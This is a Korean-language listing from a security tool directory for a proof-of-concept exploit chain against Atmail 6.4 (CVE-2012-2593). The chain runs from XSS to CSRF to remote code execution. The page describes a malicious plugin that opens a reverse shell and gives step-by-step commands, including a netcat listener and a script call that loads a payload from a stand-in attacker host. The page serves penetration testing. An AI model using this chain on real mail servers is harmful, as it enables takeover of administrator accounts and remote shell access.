Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2012-2593 — Atmail XSS-CSRF-RCE 익스플로잇 체인 | Kitploit
도구/GitHubGitHub/andrewtrube/cve-2012-2593
Exploit FrameworksPayload GenerationExploitationShellcodeWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHubandrewtrube/cve-2012-2593

CVE-2012-2593

Atmail XSS-CSRF-RCE 익스플로잇 체인

저장소 보기
4년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Atmail XSS-CSRF-RCE 익스플로잇 체인 PoC

atmail-rce.py: Atmail의 웹메일 인터페이스에서 CVE-2012-2593을 익스플로잇합니다.

atmail-csrf.js: CVE-2012-2593을 CSRF로 활용하여 악성 플러그인을 설치해 리버스 셸을 실행하는 자바스크립트 파일

Plugin.php: 리버스 셸을 호출하도록 설치되는 Atmail 플러그인

!!테스트 권한이 있는 서버에만 사용하세요

요약

Atmail 이메일 서버 버전 6.4는 Date 이메일 헤더와 이메일 본문(iFrame 삽입을 통해)에 XSS 취약점이 있습니다. 이는 자바스크립트 XHR API를 사용하여 관리자 사용자의 쿠키와 함께 요청을 관리자 웹패널로 보내 CSRF로 활용되며, 리버스 셸을 위한 코드를 실행하는 악성 플러그인을 설치합니다.

개념 증명

  1. 넷캣 리스너 시작 nc -lvp 4444
  2. Plugin.php를 열고 IP 주소와 포트를 넷캣 리스너의 것으로 변경
  3. Plugin을 gzip으로 압축하고 base64로 인코딩 gzip -c Plugin.php | base64 | tr -d [:space:]
  4. 위 출력 결과를 복사하여 atmail-csrf.js의 data 변수에 붙여넣기
  5. atmail-rce.py 스크립트 실행 python3 ./atmail-rce.py -u attacker@localhost -r admin@localhost -x http://attacker.com/malicious.js -t http://atmail.com/
  6. 관리자 사용자가 이메일에 로그인할 때까지 기다림

주의사항

  • XSS 대상이 Atmail의 관리자 사용자인 경우에만 작동
  • 대상이 웹메일 인터페이스와 서버의 관리자 인터페이스 모두에 로그인한 경우에만 작동
  • 서버에서 플러그인 설치가 허용된 경우에만 작동 (기본적으로 켜져 있음)
도구 다운로드